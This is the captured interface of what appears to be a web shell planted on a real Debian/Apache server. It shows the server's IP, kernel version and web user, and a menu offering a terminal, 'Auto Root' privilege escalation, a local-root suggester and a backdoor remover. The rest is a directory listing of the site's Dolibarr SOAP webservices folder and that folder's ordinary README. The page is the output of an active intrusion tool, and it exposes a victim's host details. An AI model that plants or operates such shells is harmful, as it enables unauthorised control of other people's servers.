Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
bdc.bdcloud.fr /
webservices /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-x---
2025-11-08 11:17
README.md
797
B
-rwxr-x---
2023-04-04 15:51
demo_wsclient_actioncomm.php-NORUN
4.31
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_category.php-NORUN
2.75
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_invoice.php-NORUN
3.92
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_order.php-NORUN
3.92
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_other.php-NORUN
2.91
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_productorservice.php-NORUN
4.97
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_project.php-NORUN
4.26
KB
-rwxr-x---
2023-04-04 15:51
demo_wsclient_thirdparty.php-NORUN
6.17
KB
-rwxr-x---
2023-04-04 15:51
index.php
1.73
KB
-rwxr-x---
2023-04-04 15:51
server_actioncomm.php
17.84
KB
-rwxr-x---
2023-04-04 15:51
server_category.php
7.78
KB
-rwxr-x---
2023-04-04 15:51
server_contact.php
22.86
KB
-rwxr-x---
2023-04-04 15:51
server_invoice.php
25.8
KB
-rwxr-x---
2023-04-04 15:51
server_order.php
29.97
KB
-rwxr-x---
2023-04-04 15:51
server_other.php
8.89
KB
-rwxr-x---
2023-04-04 15:51
server_payment.php
7.17
KB
-rwxr-x---
2023-04-04 15:51
server_productorservice.php
36.85
KB
-rwxr-x---
2023-04-04 15:51
server_project.php
13.1
KB
-rwxr-x---
2023-04-04 15:51
server_supplier_invoice.php
13.9
KB
-rwxr-x---
2023-04-04 15:51
server_thirdparty.php
28
KB
-rwxr-x---
2023-04-04 15:51
server_user.php
23.05
KB
-rwxr-x---
2023-04-04 15:51
Save
Rename
API SOAP howto ============== This directory contains files to make Dolibarr a server of SOAP Web Services. WARNING: It is highly recommended to use the REST APIs instead of SOAP APIs: You will find more API, faster and easier to use in the the module REST API than into this module. Explore the api --------------- * To see all Webservices provided by Dolibarr, just call the following Url: http://mydomain.com/mydolibarr/webservices/admin/index.php Access to the API ----------------- * WSDL file of a Web service provided by Dolibarr can be obtained at: http://mydomain.com/mydolibarr/webservices/server_xxx.php?wsdl Note, you can test this Webservices by calling the page http://mydomain.com/mydolibarr/webservices/demo_wsclient_xxx.php (You must first remove the -NORUN into file).